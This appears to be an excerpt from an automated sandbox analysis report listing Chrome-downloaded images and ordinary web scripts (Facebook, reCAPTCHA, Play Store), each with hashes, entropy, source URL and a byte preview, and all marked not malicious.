                                                                                                                                                                                                                                  Preview:RIFF>...WEBPVP8L1.../?....\[.=z.*+}...T....m.mk<s...~.|..ED.'@.3.X....MQ%...B.....t..Z.Z4C0bJ=,....T}0..0...M...{.R...g.P...p#....7..U.&C(...Q^.|.i1.kRa.j..T...:..a;*X......h.G~.....+y~.UU>?.....3..t...j.ZTC@.)...j.....}#...o.b.&...@..oeb...at.[Y...e.:{K.cI.M.|....}..)...]p.1nE...".^."[P..;..gU..>.v...<G....
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (45939)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):97853
                                                                                                                                                                                                                                  Entropy (8bit):4.6409695169080525
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:cR9pqLYmuEi/bA+TnJDpamoObnmodwbwnwmwowd6/yW8RNK+blic1rU6fJGnjkuN:6piVuEi/bA+TnJDpamoObnmodwbwnwmF
                                                                                                                                                                                                                                  MD5:56922B59D92E23C35526DA118D91489B
                                                                                                                                                                                                                                  SHA1:ED7E5AD4B9BA3A030DD1EF89DD1F8ACC263A3A1A
                                                                                                                                                                                                                                  SHA-256:D6CD81C2A7964E01179F4311942C61B0ED49032C3C9112FB74EF5684A2B3F282
                                                                                                                                                                                                                                  SHA-512:A408CC2D4FE5DC52529B11A88C9EDFC678A4E1CF634CF54F76A3739C7C8E555E726DAC3FEF362DF43A2871A46BA764F7DC29F477071CD6183617F4AC86C6D3EB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3iNig4/y7/l/en_GB/79SeOVWXEcm.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometLinkNewImpl.react",["BaseLink.react","CometDangerouslySuppressInteractiveElementsContext","CometLinkUtils.react","FDSTextContext","gkx","isCometRouterUrl","react","react-strict-dom"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||(h=d("react")),j=h.useContext,k={disabled:{color:"x1dntmbh",textDecorationLine:"x1ubmc1d xkrqix3",$$css:!0},root:{color:"x1heor9g",textDecorationLine:"x1sur9pj xkrqix3",$$css:!0}},l={block:{display:"x1lliihq",$$css:!0},"inline-block":{display:"x1rg5ohu",$$css:!0}};b=i.forwardRef(a);function a(a,b){var e=a.color_DEPRECATED,f=a.disabled;f=f===void 0?!1:f;var g=a.display_DEPRECATED;g=g===void 0?"inline":g;var h=a.href,m=a.role,n=a.target,o=a.weight_DEPRECATED,p=a.xstyle_DEPRECATED;a=babelHelpers.objectWithoutPropertiesLoose(a,["color_DEPRECATED","disabled","display_DEPRECATED","href","role","target","weight_DEPRECATED","xstyle_DEPRECATED"]);var q=d("FDSTextContext").useFDSTextContext(),r=j(c("CometDangerouslySuppressInteractiveEleme
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 32x32, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):244
                                                                                                                                                                                                                                  Entropy (8bit):6.963642012115317
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:c3ZrCl55FNQgk96SI87A/2KJoinFq+hKoqOftMVwiYgIl:c3BCr5/Qvi+A/2KJBFq+cLwtMVu
                                                                                                                                                                                                                                  MD5:063DAE3F8D84FF97CD357C7D86CDC598
                                                                                                                                                                                                                                  SHA1:21B428150D49A7B399893558655FAE71870FC4E3
                                                                                                                                                                                                                                  SHA-256:ABBCAF1BF24A065A6835A679F16B6F30A6B13179D67135F20B8B3D70A4617225
                                                                                                                                                                                                                                  SHA-512:8BA5D9063053F2244812C8B8597B5C5DC41F97D4E99FB53E38F008134CF5C1EAA8921D5E0A4F55234A88B76A165CDD5BC4E2046FDE7A82CF301D7F7A0D272F6E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8 .........* . .>e(.E."....@.D..]......W..o..;q....$V.........,m...........f.Z.N}{..%.....}(`h....g6=..~............Rf.....q.laNN.(_i......F..<t......_.v-.D.m[.....Id..(.....(...B.Z....."..}...^1.;g..p..3....@.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):75826
                                                                                                                                                                                                                                  Entropy (8bit):7.9957491622723245
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:1536:oZb6ILUjdBFM/mo1Ysk+RCS+x2Y/+4Qwwe0uLfgu93TfDiDP1w2:W6U4BFYmo1U+E/4zwwqrCq2
                                                                                                                                                                                                                                  MD5:36FB55BBCCA237887CD2D16C8EEF8693
                                                                                                                                                                                                                                  SHA1:12A2DF1B3993E8D02B7C88B25A6FBE83D4FCAE8F
                                                                                                                                                                                                                                  SHA-256:FDA7D35F1C33D32981497844E22307A4E27C82836FBFC63444906C4ED73AC4B8
                                                                                                                                                                                                                                  SHA-512:877F4C53FBBCEAFD52D2D43BBB68D409941E9B5401C76ABD726AD670BD2FE3073BBB251E5F7DF1B4DC3164D1FA8F7D141A784D93BD9EC78978F132396A233BD2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF*(..WEBPVP8L.(../..2.MH..6l....I..?...BD.'@j...~&...fw....m{Y....>...=.@....V.....*.+..:..=.N.., ..I.\.{...8H....$d...;I..9..HU.A`B.s...$..#.\.&@.G..e{...l@I..7...x.@q-p.9....,..{.}....4.....cZ....@(`......-.[..yN.@/`L/.1(yb>.m}.*..m $.WU.4Q$.=....!Ik....(.........s...UpWIu?.....g.....d{K[.....EC..8).....O.jI\R....7@o.R..n.V..$.....{.z....~.GZ....e...[......[-iI.]^.6..-)urH.e.P..).:...k....|.9m....m...%N...U.....g%.<a.......Ef<.....?..H...Xp.L......L... .......P..n.%c.j{F.-.k.......*..[...V.........&UU./m.....=..-E.].N.?o....(....W.......l.....A.Rm..,......!..h..I...?..O/...o.4.mko.F......\...B..9V.....R.`...?..!..WU..{".PTI%.2....8-.fE1.}...@..PQ.&....C...(..Q...Q.1$..b$..J.1......C..;..3w...R..#z\.T*.!C......#..+.J8...0..K.;....dH.D.....@..k..#..J...^........k@"*...+...t.c..x.;.}...E'.0.Z_....{\...;.".J.....L.Mm.v..G...W.3<..bx.,......|........v..$N.....9ztA.T.....4|.P.&u...t.p.g..v...b.1..?....,..-.........[.O..x.&.S...(.....J.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (724)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):551834
                                                                                                                                                                                                                                  Entropy (8bit):5.646059185430787
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:ytxIUYTteVvs0E8gSdoxS4MLYw1tZnAzsz1I9VBojCdzNDC2vPpD:ybYTZMgGopkAzsz1ciEU2d
                                                                                                                                                                                                                                  MD5:33AFF52B82A1DF246136E75500D93220
                                                                                                                                                                                                                                  SHA1:4675754451AF81F996EAB925923C31EF5115A9F4
                                                                                                                                                                                                                                  SHA-256:B5E8EC5D4DCC080657DEB2D004F65D974BF4EC9E9AA5D621E10749182FFF8731
                                                                                                                                                                                                                                  SHA-512:2E1BAAE95052737BDB3613A6165589643516A1F4811D19C2F037D426265AA5ADF3C70334C1106B1B0EEF779244389F0D7C8C52B4CD55FCE9BAB2E4FCB0642720
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://www.gstatic.com/recaptcha/releases/xds0rzGrktR88uEZ2JUvdgOY/recaptcha__en.js
                                                                                                                                                                                                                                  Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var z=function(){return[function(v,p,K,u,W,n){if(!((v>>2&(n=[6,"Unknown format requested type for int64",9],n[0])||!U[22](11,this.U(),p)&&this.dispatchEvent("enter")&&this.isEnabled()&&R[23](n[2],this,2)&&R[3](n[0],2,!0,this),v-1)<20&&(v>>1&7)>=4&&(u=new vf,W=R[41](1,p,u,kV,K==p?K:P[8](37,K),5)),v<<1&11))throw Error(n[1]);return W},function(v,p,K,u,W){return((W=[17,7,46],v)<<2&W[1]||(p=function(n){return K.call(p.src,p.listener,n)},K=UJ,u=p),(v-1|12)<v&&(v-9|59)>=v)&&(u=M[W[2]](15,p)&&!M[W[2]](13,."iPod")&&!M[W[2]](W[0],K)),((v|8)&W[1])==1&&(u=p.Y?p.Y:p.I?"application/x-protobuffer":""),u},function(v,p,K,u,W){retu
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (785)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1371
                                                                                                                                                                                                                                  Entropy (8bit):5.314499238164883
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:kzTorJWvwfRFm2L/IQXoAmGlj1LGbRhGbZ4m7N7EdeoWrmuteQlrl:ktvwbml8lj1LGbRhGbKm9EsLlrl
                                                                                                                                                                                                                                  MD5:FD9669022126462A1A7A463C89B5178B
                                                                                                                                                                                                                                  SHA1:1825419BB6E20D282FDD6ABABBE909E05D68059E
                                                                                                                                                                                                                                  SHA-256:53C0CC6781396AB657A891BA360B7E53C4473B19B669B79B05B89F869A7854F3
                                                                                                                                                                                                                                  SHA-512:F31BD5ACCA477B4F8C0B7C331F1017087F7845446E0ADD386478E6BFCD2DEA8021284E4C0E4DAE992FEDEF3C1018B9333C7A682DDD957F2B69897E1288218F5D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("P6sQOc");.var cab=!!(_.xf[3]&8);var eab=function(a){const b={};_.wa(a.ua(),e=>{b[e]=!0});const c=a.N(),d=a.na();return new dab(a.V(),_.jh(c,1)*1E3,a.H(),_.jh(d,1)*1E3,b)},fab=function(a){return Math.random()*Math.min(a.na*Math.pow(a.ka,a.H),a.ua)},QK=function(a,b){return a.H>=a.V?!1:b!=null?!!a.wa[b]:!0},dab=class{constructor(a,b,c,d,e){this.V=a;this.na=b;this.ka=c;this.ua=d;this.wa=e;this.H=0;this.N=fab(this)}};var gab=function(a,b,c,d){return c.then(e=>e,e=>{if(cab)if(e instanceof _.Xd){if(!e.status||!QK(d,e.status.H()))throw e;}else{if("function"==typeof _.dq&&e instanceof _.dq&&e.N!==103&&e.N!==7)throw e;}else if(!e.status||!QK(d,e.status.H()))throw e;return _.Sd(d.N).then(()=>{if(!QK(d))throw Error("Cc`"+d.V);++d.H;d.N=fab(d);b=_.gj(b,_.Via,d.H);return gab(a,b,a.fetch(b),d)})})};._.Eq(_.ALa,class extends _.Dq{static Ia(){return{service:{HO:_.aab,metadata:_.bab,l0:_.$$a}}}cons
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):198604
                                                                                                                                                                                                                                  Entropy (8bit):7.991562366774542
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:6144:5dx+LXb242Jf1pb1BrXQrdMX3lZhCTxDKVq:Ym42Jf1p7aihwj
                                                                                                                                                                                                                                  MD5:CCB4128F1871BB6AA79F84420107C28D
                                                                                                                                                                                                                                  SHA1:C34DCCE326A2E7D205049DDB9F2F4B30DF0CAB2B
                                                                                                                                                                                                                                  SHA-256:066E40A4D44155DAFE9636BE361056E055472B777D7D5324894A1921A68D75AB
                                                                                                                                                                                                                                  SHA-512:982EBFAFCAE5B2F1E14C5D51D165336F913AE1F46A8CF492A59F0A140A719A64CFA3050839560BDF9AB4E327DA3DA6E91604EB6C14B219403166780E429474AF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/c3SRuvi4eb82MzWlnUgy_xyUkCYF8MWFqol3ejyiMR17u1NnI1X0UHFNkLEjCgMT=w526-h296-rw
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../..I.M@.d+l.{...../X8..".?...?w.{.*u..>...H...SM@............Ib...+.1p.y.S.E.W|.V....fN.Z....>.;.....I..:.._.\...K'..$O/M.QO}4_..I....."c..U5..w.....,5.....g<O.d.....'.g.W....;..7..'}b.$+...t..'.1;|...kiu.P....>...k%....!O..Y._.....YI>.G P.$....O.^...DGLT..j.e....;....*...bV..tf....V.W.V'..y?;.V....4O...A`..s&.%|...I.J|A......=w...V....Z..&.zy.;..-...O.X....#..z.k.@;'...J.{tvL...?..!L........9.0Q..z.ObU.P.1.i....J. .......@7.g...&1.}e.....>..0.Jf.n.0....s....8..._zVW.['.H.[N;.U.Z...........;0.@mN]..O[..d.c.<0.q...Y).R.....>....3a.Sw`.y...L..;.2.U......N.%..6..9...>'.....1.9..3A.*6....AAaL.g&hw....SUu...T...c.u..BI.$..p........AR.'p.EQ.A..u.....h..[DD)%v.~............RJ.b1M.4,...m{.H...!0.t..l.... ..AU]W.{...6.B(.?A.................N@.r..^....../..n........O.(.>.......&....;)....@..........&|......*E.d.%z..r..;.8...`.p4.....FB|B...hx@...$....H.d.....=qO.A.../X....mQ..ND..#.9.........y.:..n..f..h..A..F.z.nt..Cq...;... N.C....`%
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):200
                                                                                                                                                                                                                                  Entropy (8bit):6.8089822048404605
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:wl/yi1ZrRl/Kiwi7/Q+x85mmZ4df7UVksyqUjLp/nwoZ9kqqVC03pjpolqeOo:wAi1Z6iP3q/4Uw7fDDkqq40Zjpolqs
                                                                                                                                                                                                                                  MD5:DF61C422ECAE7409B8697262192A44FC
                                                                                                                                                                                                                                  SHA1:D402D28A126D995638A2F434DDBD2B276887B599
                                                                                                                                                                                                                                  SHA-256:329AD3C7AC436F964C7A8CFCC6A74C859B51CDABD8974A65F0836410B11F2DC5
                                                                                                                                                                                                                                  SHA-512:32B50246FF38917D79C18C2750FDDDAFD991EBB72F9B1EADF0FF928FA0F083EE1C6BA74F697549E50743E89E1E9FB547E666A895801669C7AC65219691492562
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../.....@.m..a...6..}....$../..H..\.O.,.^.C|}lX.|l..<8Dl4<.\,.c....!.H..0..D.....8.D._..6.....4./.a..\.v......._...}.p.|..._.5......SLasI.R...<ODg..Qf...u.-......9..|.6.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9204
                                                                                                                                                                                                                                  Entropy (8bit):7.97905201911326
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:r38tDAWM+egFJt4NPfYUfooEMAY7scQNv1Ees8:gF8frfooLoR95
                                                                                                                                                                                                                                  MD5:8F712478B03F2C4DA3183F96248AD1FE
                                                                                                                                                                                                                                  SHA1:BA6CF6860F9657FD1F1B8E1BB660A39B589AB0B6
                                                                                                                                                                                                                                  SHA-256:5AAC149EED4335B87CAE2FF3E177FBB55D5CE17B49D27A4A5CDAC61A5B89C72B
                                                                                                                                                                                                                                  SHA-512:ADB03392D73F6DEA6C1505D622E34C8F068447E1507DC964EB429F81D2839517F1210AD7156BF01875EEAC8B082126E1C12DA2BC5B643873A89352410876081D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF.#..WEBPVP8 .#..0~...*..(.>Q .E#....FD8......6...?#...y........v...O./$........W|....K.w.....{.~......a..O./.....{......E........X..................................?t..............O.}.........|..e.................g...$.v4..oP_m.....'...g.~..l.........?U..xZ......._....~=}6.K.....W./........k......l.]..?...?^..%A7.U...i..Z....X......]....R...z.4X....so...U.G.?.Y......x.G..n.!.V...Y5$.+.].p..?).V.k..@.X....Uh...C.Z...k.Pz.1.).|n.c*.....V..5.J.....`)..c.....C..) ....":..I.G.6.....%.0!.h.....hc.d|.s%.D.g..-..H.V.l.a..=..Cz.\./..V...<.~jB3<..d..g..U.g.H:..[.hsh.........w...S.ov.....Q.D....6....5.lE.&.d..`A.5~.h....o.t[.f.H.!N....[."..0..+..b.G^.......0.........l..r..$]...9.D.W...a.&G.n$......hS.......ZRM.3MLe.EW..nQEpl..u...Y.K..........91...[b<.vi~U^......B$..V.....m.Z@.w5.k..k:..f].zoN....O..q.....I..jr..a...H:#.....l.Nl..Q...4DRo......P..5...$..$z.........E..vs.g[q.U....r.v:.(.>..dGx.......q.V\.....E.m.....J.1.".......<..y....u....f3.g.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:C source, ASCII text, with very long lines (438)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):2078
                                                                                                                                                                                                                                  Entropy (8bit):5.387806824958302
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:YHTs34IWJ6O346+3+96s3zf3Ek+n8No4YGbIh4:6fIWJj3453wx3D3Ex8NMq
                                                                                                                                                                                                                                  MD5:C85FC19BDEF9BB7DC0AD69D0BCEF07D8
                                                                                                                                                                                                                                  SHA1:BDC00700BE6D5B5FBA7F565C6FB2FD1AD39D06A4
                                                                                                                                                                                                                                  SHA-256:6A694C1ECFF2EE11F8075A915B3C3FEEAF2EB33DC04CD8144CDD762E71260051
                                                                                                                                                                                                                                  SHA-512:DDF8AE079503BCE91ACC37A3A7552B52ED0DE2D9AF79076A1C04F7991D3775C7A829298D5A3A9962040A5C2FB6A0699D6584510704004ECBCB6471D33BE38C5F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/OJuPnvrkEfZ.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("Deferred",["Promise"],(function(a,b,c,d,e,f){"use strict";var g;(g||(g=b("Promise"))).resolve();a=function(){function a(a){var c=this;a=a||g||(g=b("Promise"));this.$1=!1;this.$2=new a(function(a,b){c.$3=a,c.$4=b})}var c=a.prototype;c.getPromise=function(){return this.$2};c.resolve=function(a){this.$1=!0,this.$3(a)};c.reject=function(a){this.$1=!0,this.$4(a)};c.isSettled=function(){return this.$1};return a}();f["default"]=a}),66);.__d("isArDotMetaDotComURI",[],(function(a,b,c,d,e,f){var g=new RegExp("(^|\\.)ar\\.meta\\.com$","i"),h=["https"];function a(a){if(a.isEmpty()&&a.toString()!=="#")return!1;return!a.getDomain()&&!a.getProtocol()?!1:h.indexOf(a.getProtocol())!==-1&&g.test(a.getDomain())}f["default"]=a}),66);.__d("isHorizonDotMetaDotComURI",[],(function(a,b,c,d,e,f){var g=new RegExp("(^|\\.)horizon\\.meta\\.com$","i"),h=["https"];function a(a){if(a.isEmpty()&&a.toString()!=="#")return!1;return!a.getDomain()&&!a.getProtocol()?!1:h.indexOf(a.getProtocol())!==
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 395x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17070
                                                                                                                                                                                                                                  Entropy (8bit):7.988317321389732
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:wOHhhNqlo9N9XwqApqnM4040og7PlW0JQLa+X:wYNiol1443QR2pX
                                                                                                                                                                                                                                  MD5:C019051EE1A7C6FB5FC8B600A0DA1C1E
                                                                                                                                                                                                                                  SHA1:2978F635256666B167EBF7E3687AA82CD25EF9AD
                                                                                                                                                                                                                                  SHA-256:17DF26601D1C695DAD42B960143B0830B9DA296356D0B0997CC910F40AE363C3
                                                                                                                                                                                                                                  SHA-512:3C392A3FE58032E38143043CC216593650014CF9B571BFCF76890133FC408113FE9AC83AF81F8649FF9D69FBEA19C2A8C8CE3CD562B53F2BD7649BCB20D12BF3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF.B..WEBPVP8 .B.......*..(.>M .E".!... (..o..Q.....Mo...e..y....t.._c....Og..?....g.....?......l...v.E~..........}...7.../M/d..Oa...M..O..._.l}...{.........Z..........?p.........a.3..._..t?.....^....G.O...[.7%..z.{.......y..|S....N.............o.?]..j..3.............'}U...?.w._....~Q|.{...........0.....],88.D.C@.L~.......V ..3._zP.....Z....o|_p^..a.7..K.w..C..F... D....]....f.z,....9...............sFD..7.}\9.[.].E..*..9......O.M........".lrG...rz...).r.m.../.K5.......q....l...]F...@-k..Z*.........S....1@}-...XB..."I.d. S-.L..%V.H....!D.+...T..z[i..K.g...".h?.Ac.5G!.}.a.G...b..-M.x[l..2...O..1.+...N.....v..#z-....G.O.nP.Q..w.2(....s....=.G.oOg..v.-.+V,e.....6R..).....7.!:O.:L.M.....{=.6.........1..Ii.....}M...,.Y.kz.+.\.&)....e.pq.j...Q4:....6r.Y...is..R.......d.....BO.......]%;6S..NCQ.Z...+.$....~...W...c.V....+B1.}..9.....?D*g...W[.S..'....K....... .B..T9o....s9..Mb...tg...y.:.l....Q..&...<L=.].FE..>..0?m....Q)3EM.....?}......<....FJ..=
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 526x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):19720
                                                                                                                                                                                                                                  Entropy (8bit):7.988703628228792
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:wwHG9TRaKXK0otm1eD7/tVycSDYDv6HyXWbvpGeLFDnlVzl0V0D/J+DoLuI7K9:RaR/OtzztbvXWbvPQ2DhyI+9
                                                                                                                                                                                                                                  MD5:B83BF3A177E8E342C21DE75C24C5CE0D
                                                                                                                                                                                                                                  SHA1:BAF66E6DC0B88A068FB7A554CDEB3D4788C96715
                                                                                                                                                                                                                                  SHA-256:A3E0BED74E616BEEA0F43FFB8F67780D3854BF650CC9BE92D867AED8E8548528
                                                                                                                                                                                                                                  SHA-512:4C34115B1B5F7CB97249B1A84D697BE8F30C6506931C9579591930E4109FA49571C5ED5E247335407CEB4EA73668CD59F032780E34A134360F925F7D7F9E2BD4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/uQ9hA-fPwMe3U8m0i1lqnLVLKObQWhygMvfHURGy-umOu6EJirFNDqFyiSSLfyb0KA=w526-h296-rw
                                                                                                                                                                                                                                  Preview:RIFF.M..WEBPVP8 .L..p?...*..(.>E..E"....].(.D..^.Lop/.. ._ZZ4H...?...{....f{3..|...._...._.=Y~..........'.....?...h.p=.....{......../......}s=........#......]o._...|..b...m.'.......7....\.....o.<A.?./.?o}..oi..?,~.._..o.|;...7._.w...?..d.z....?........U.s._..?.[.......Oc..x..[._.'.......~a|...........|../...7.?.g.g.Ot.._.=.b...W.R.....H\.B.a....o.......n.]....B.... .^....N......?..jp.FRyf...;3...`..f.;"U..e..)...2.\.]..............rk...V...=...A.6..$......9M.t_Jo.Q.....I'.......ly.`.K..D....i..[ 8........"Z`&..^..m...7.....X.....a..?...U.?}.F.F....I....W...G....S/.].9{.uW.F{k~.+..Y..[...h....PH....h..].....#.!.#R...VO..|...J.mK.....K.9...%.T...s.....>.mA..W)..1......x....a..=Y.^..=....+8A..61F.J.....q......BNQ:4...l.M[8M...E.o.o.....5..j..........8@.!@.#..6...7..iU.W..Zwg..Z....T......_.9*..~.U.z]..L{|..}....o.H......1].g...2...2...Yj....P..RV...c...[......W.4..x}..C..?......I.e.......^.}...w..w..4S..6......j.r.or...k..a.'.P
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):9540
                                                                                                                                                                                                                                  Entropy (8bit):7.971812185114183
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:5mNgmnHvyM5E3U5/73FRuMdaXs0m1acoS+g8e7UnmXFeXbgd2WeTMdHK34Dg:5yguHsE5T/daXs0m8m7cm0Xb7TwM
                                                                                                                                                                                                                                  MD5:283602777EEBD73ECB356545D207EDAC
                                                                                                                                                                                                                                  SHA1:222B14B3CDD540F60697CE68A206C26E6ED98B64
                                                                                                                                                                                                                                  SHA-256:26F13669B7AE2D64C6199FD69A43C922C6B86230D8B6EA248EAE7C85BB6A6E33
                                                                                                                                                                                                                                  SHA-512:A8C45E42337E9AA54B97B4FE84AFB21BB295B887823E1577F54DEB7B938ADC98E6876A44EF0A89404D666C76E5DB68499AD4897727E58022A674A5905CC4B970
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://is1-ssl.mzstatic.com/image/thumb/PurpleSource221/v4/92/56/e5/9256e528-a2d2-4c99-844e-1e1c33ac05ff/544105ea-d501-40ab-ada8-ef4c61d0e570_4_iOS_6.7.jpg/230x0w.webp
                                                                                                                                                                                                                                  Preview:RIFF<%..WEBPVP8X..............VP8 .$..p....*....>.J.I..6....*......p/.L..q=......................'~e...E............k}..........{.o.'..c?._.....~..w{,.w....._......./J.g......?.|.....q.....>......B=..............B.........>.>......O.....].=.........A%ZT.Y%ZT.Y%ZT.Y$...R.j.$...g...(..x..Z..u6.@.!.N...I.wS...#.....V....s....t-...My....V...]...s../s.....2.Y..A".V......O......Rmd],......t_<g..7o.>..U"S.....f1.L..l.5.e..H(..g.....9.....A.3.ve.@v.<.;..,D...i?.|.0..b..hzz....L3.;k. .I.].....D...kQ.....z'.A;....Q..x...)F;.......&.r.s...B.Dc.A6...9~..R...z.._O`...Hu....T-.q....Q.ST...i.....Y:.:.h.2o..z.kLn"Yn..U...RE".[V..H.P..".o.|..pC..B..I,.ig..r....Z${....2..N."....j.....2.......*..YXR.H3.)....U.\...M..=C..g.^.........t./t......&..kmV..U...X2.#..|.Z.$<...9Y.1Y.....*/....V..._...^.k....6.K0...3|-....!u...Q..|..k....`..>|b6....|9".t...)py}JF.)....HGb..6..Y...5.....z..J.'....Z\.Oi...U.Y..J..Y.......a...\=.t.1$y.....^.H.4.Gt......u.....;(C~...i.M
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):292598
                                                                                                                                                                                                                                  Entropy (8bit):7.995047264929955
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:6144:jmmJmKG7VkY0CGFsYst9NXt9lsMPZNMBLRe4cOfMxj3D6DT:jPi7eNFsYs3NXt9lsMLIrA3D6DT
                                                                                                                                                                                                                                  MD5:3F48F07C32DA693F1F8983918F9E50DA
                                                                                                                                                                                                                                  SHA1:E2C4392C46BC3896BA927C7905435D1BF66DD662
                                                                                                                                                                                                                                  SHA-256:7A694260C4F4B5A09D9162EBC56E3413D5BCD1D1006A9481AEDB1EB3F1BEC710
                                                                                                                                                                                                                                  SHA-512:6672B1726544D906AA60FFE353C525E4C5203FA11340147B54E168D685B523390920D85C6546833EB1A85036761E96C8A704A86BCB8A28F882526E344FD4278A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
